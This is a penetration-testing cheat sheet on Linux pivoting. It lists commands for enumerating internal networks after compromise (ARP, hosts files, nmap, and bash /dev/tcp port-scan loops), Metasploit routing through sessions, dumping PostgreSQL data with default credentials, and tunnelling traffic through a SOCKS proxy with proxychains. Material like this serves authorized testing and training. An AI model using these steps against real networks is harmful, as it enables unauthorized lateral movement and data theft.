Exploit Notes

Linux Pivoting

Last modified: 2023-02-05

Network

Accessing obtained over one machine to exploit another machine deeper in the network.

Enumerate Network

After entering the target server, enumerate and search other networks.

Check the ARP Cache in Target Machine

arp -a

Check IP Addresses

cat /etc/hosts
cat /etc/resolv.conf
nmcli dev show

Search Other Network Ranges

# We may be able to find the other ip addresses in hosts file.
cat /etc/hosts

# Mapping network ranges.
nmap 10.0.0.1-255
nmap 172.17.0.1-255

# Manual
for i in {1..255}; do (ping -c 1 10.0.0.${i} | grep "bytes from" &); done

Port Scan

If we find other ip addresses, let's find the open ports.

nmap 10.0.0.1
nmap 172.17.0.1

# Manual port scan
for i in {1..65535}; do (echo > /dev/tcp/172.17.0.1/$i) >/dev/null 2>&1 && echo $i is open; done

Basic Flow with Metasploit, Meterpreter

msfconsole
msf> use auxiliary/...
msf> run

msf> background

# Upgrade the latest session to meterpreter
msf> sessions -u -1
# Interact with the latest session (meterpreter)
msf> sessions -i -1

# Resolve the remote hostname to an ip address
meterpreter> resolve <variable>

# Background the meterpreter session
meterpreter> background

# Configure the routing table to the destination for 172.28.101.51 (outputted ip of the "resolve" command) to the latest opened session.
msf> route add 172.28.101.51/32 -1

# Configure the routing table to the other destination for 172.17.0.1 (e.g. written in /.dockerenv) to the latest opened session.
msf> route add 172.17.0.1/32 -1

# Print the routing table
msf> route print

After modifying the routing table, you can fetch information using the IP (e.g. 172.28.101.51) in msfconsole. For example:

# PostgreSQL
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> run postgres://postgres:postgres@172.28.101.51/postgres

msf> use auxiliary/admin/postgres/postgres_sql
msf> run postgres://postgres:postgres@172.28.101/postgres sql='select * from <table>'
  • Socks Proxy

    It is an intermediate server that supports relaying networking traffic between two machines.

    msfconsole
    msf> use auxiliary/server/socks_proxy
    msf> run srvhost=127.0.0.1 srvport=9050 version=4a
    
    # Check if the socks proxy is running as a background job.
    msf> jobs
    # Stop the socks proxy
    msf> jobs -k <job-id>
    

    After that, you can use the localhost using tools like curl, proxychains.

    curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v
    
    proxychains nmap 172.17.0.1
    proxychains ssh <user>@172.17.0.1
    

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.